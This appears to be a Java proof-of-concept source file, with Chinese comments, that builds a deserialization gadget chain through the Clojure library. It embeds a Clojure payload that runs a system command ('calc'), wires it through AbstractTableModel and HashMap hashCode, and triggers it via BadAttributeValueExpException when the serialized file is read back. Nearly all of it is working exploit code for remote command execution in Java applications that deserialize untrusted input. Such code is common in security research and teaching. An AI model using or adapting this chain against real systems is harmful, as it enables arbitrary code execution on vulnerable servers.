(String[] args)
| 16 | public class Clojure { |
| 17 | public static String fileName = "Clojure.bin"; |
| 18 | public static void main(String[] args) throws Exception { |
| 19 | |
| 20 | // 执行系统命令的两种写法,本质都是使用 java.lang.Runtime 类 |
| 21 | String payload1 = "(import 'java.lang.Runtime)\n" + |
| 22 | "(. (Runtime/getRuntime) exec\"calc\")"; |
| 23 | |
| 24 | String payload2 = "(use '[clojure.java.shell :only [sh]])\n" + |
| 25 | "(sh\"calc\")"; |
| 26 | |
| 27 | // 初始化 AbstractTableModel$ff19274a 对象 |
| 28 | AbstractTableModel$ff19274a model = new AbstractTableModel$ff19274a(); |
| 29 | // 使用 core$constantly$fn__4614 保存 payload 对象,调用其 invoke 方法时会返回 payload |
| 30 | core$constantly$fn__4614 core1 = new core$constantly$fn__4614(payload2); |
| 31 | // 将 core$constantly$fn__4614 和 main$eval_opt 保存在 core$comp$fn__4727 中 |
| 32 | core$comp$fn__4727 core2 = new core$comp$fn__4727(core1, new main$eval_opt()); |
| 33 | //main$eval_opt.invoke(payload) |
| 34 | |
| 35 | // 将 hashCode 与 core$comp$fn__4727 进行映射 |
| 36 | HashMap<Object, Object> map = new HashMap<>(); |
| 37 | map.put("hashCode", core2); |
| 38 | |
| 39 | model.__initClojureFnMappings(PersistentArrayMap.create(map));//存放 |
| 40 | |
| 41 | // 使用 HashMap hashCode 触发 |
| 42 | // HashMap<Object, Object> hashMap = new HashMap<>(); |
| 43 | // hashMap.put(model,"su18"); |
| 44 | // hashMap.put("su19","su20"); |
| 45 | // SerializeUtil.writeObjectToFile(hashMap, fileName); |
| 46 | // 实例化 BadAttributeValueExpException 并反射写入 |
| 47 | |
| 48 | BadAttributeValueExpException exception = new BadAttributeValueExpException("Firebasky"); |
| 49 | Field field = BadAttributeValueExpException.class.getDeclaredField("val"); |
| 50 | field.setAccessible(true); |
| 51 | field.set(exception, model); |
| 52 | |
| 53 | // 使用 BadAttributeValueExpException toString 触发,还是会调用 hashCode 方法 |
| 54 | |
| 55 | SerializeUtil.writeObjectToFile(exception, fileName); |
| 56 | SerializeUtil.readFileObject(fileName); |
| 57 | } |
| 58 | } |
nothing calls this directly
no test coverage detected